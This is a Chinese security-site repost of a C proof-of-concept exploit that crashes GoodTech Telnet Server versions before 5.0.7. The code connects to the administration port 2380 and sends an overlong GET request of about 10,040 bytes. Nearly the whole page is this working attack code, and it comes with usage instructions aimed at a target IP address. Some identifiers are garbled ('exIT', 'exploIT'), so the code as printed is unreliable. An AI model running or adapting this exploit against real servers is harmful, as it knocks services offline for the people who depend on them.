GoodTech Telnet Server < 5.0.7 Buffer Overflow Crash Exploit

　您现在的位置：捷凌网安 >> 编程语言 >> Exploite >> 正文

作者：佚名责任编辑：左决点击数：更新时间：2008-2-16 6:54:33

以下是引用片段：
/******************************************************************************************

       GoodTech Telnet Server Buffer Overflow Crash POC
       created by Komrade
       e-mail:       unsecure(at)altervista(dot)org
       web:       [url]http://unsecure.altervista.org[/url]

Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
on a Windows XP Professional sp2 operating system.

       This exploIT connects to the Administration server of GoodTech Telnet Server
       (default port 2380) and sends a very long string (10040 bytes).
       After the exploIT is sent the Telnet Server will crash, trying to access
       to a bad memory address: 0xDEADCODE.

Usage: gtscrash.exe "IP address"

Options:
"IP address" The IP address of the computer running GoodTech Telnet Server

*******************************************************************************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{

       SOCKET sock;
       struct sockaddr_in sock_addr;
       WSADATA data;
       WORD p;
       p=MAKEWORD(2,0);
       WSAStartup(p,&data);
       int i, n, err;
       unsigned char *mex;
       char risp[4096];

       printf("------------------------------------------------------------------------------\r\n");
       printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
       printf("\t\t\tcreated by Komrade\r\n\r\n");

       printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
       printf("\t\tweb: [url]http://unsecure.altervista.org[/url]\r\n");
       printf("------------------------------------------------------------------------------\r\n\r\n");

       if (argc < 2){
              printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
              printf("Options:\r\n");
              printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
              exIT(0);
       }

mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

       sock = socket(AF_INET, SOCK_STREAM, 0);
       sock_addr.sin_family=PF_INET;
       sock_addr.sin_port=htons(2380); /* Administration web server port */
       sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

       err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
       if(err<0){
              printf("Unable to connect() to %s\n", argv[1]);
              exIT(-1);
       }

strcpy (mex, "GET /");

       for(i = strlen(mex); i < 10032; i++)
              mex[i]= 'a';
       mex[i]=0;

strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
strcat(mex, "\r\n\r\n");

printf("Sending %d bytes.....\n\n", strlen(mex));
n=send(sock, mex , strlen(mex), 0);

       n=recv(sock, risp, sizeof(risp), 0);
       if (n < 0)
              printf("GoodTech Telnet Server succesfully crashed!!\n");
       else{
              risp[n]=0;
              printf("%s\n", risp);
       }

       closesocket(sock);
       WSACleanup();
       return 0;
}

上一篇文章： Microsoft Windows XP/2003 Remote Denial of Service

下一篇文章： Chat Anywhere Local Passwords Disclosure Proof of Concept Exploit

最进更新

	VC++设计超强仿QQ自动伸缩窗	04-17
	基于HOOK和MMF的Win密码渗透	04-17
	几种VC++数据库开发技术的相	04-17
	多线程、Socket技术及委托技	04-11
	VB.Net连接各种数据库的几种	04-11
	VB.NET中的多窗体编程：升级	04-11
	用VB.NET定制Windows控件	04-11
	VB.NET中监视文件夹的变化	04-11
	VB.NET中对象的克隆	04-11
	VB.NET中的TextBox控件详解	04-11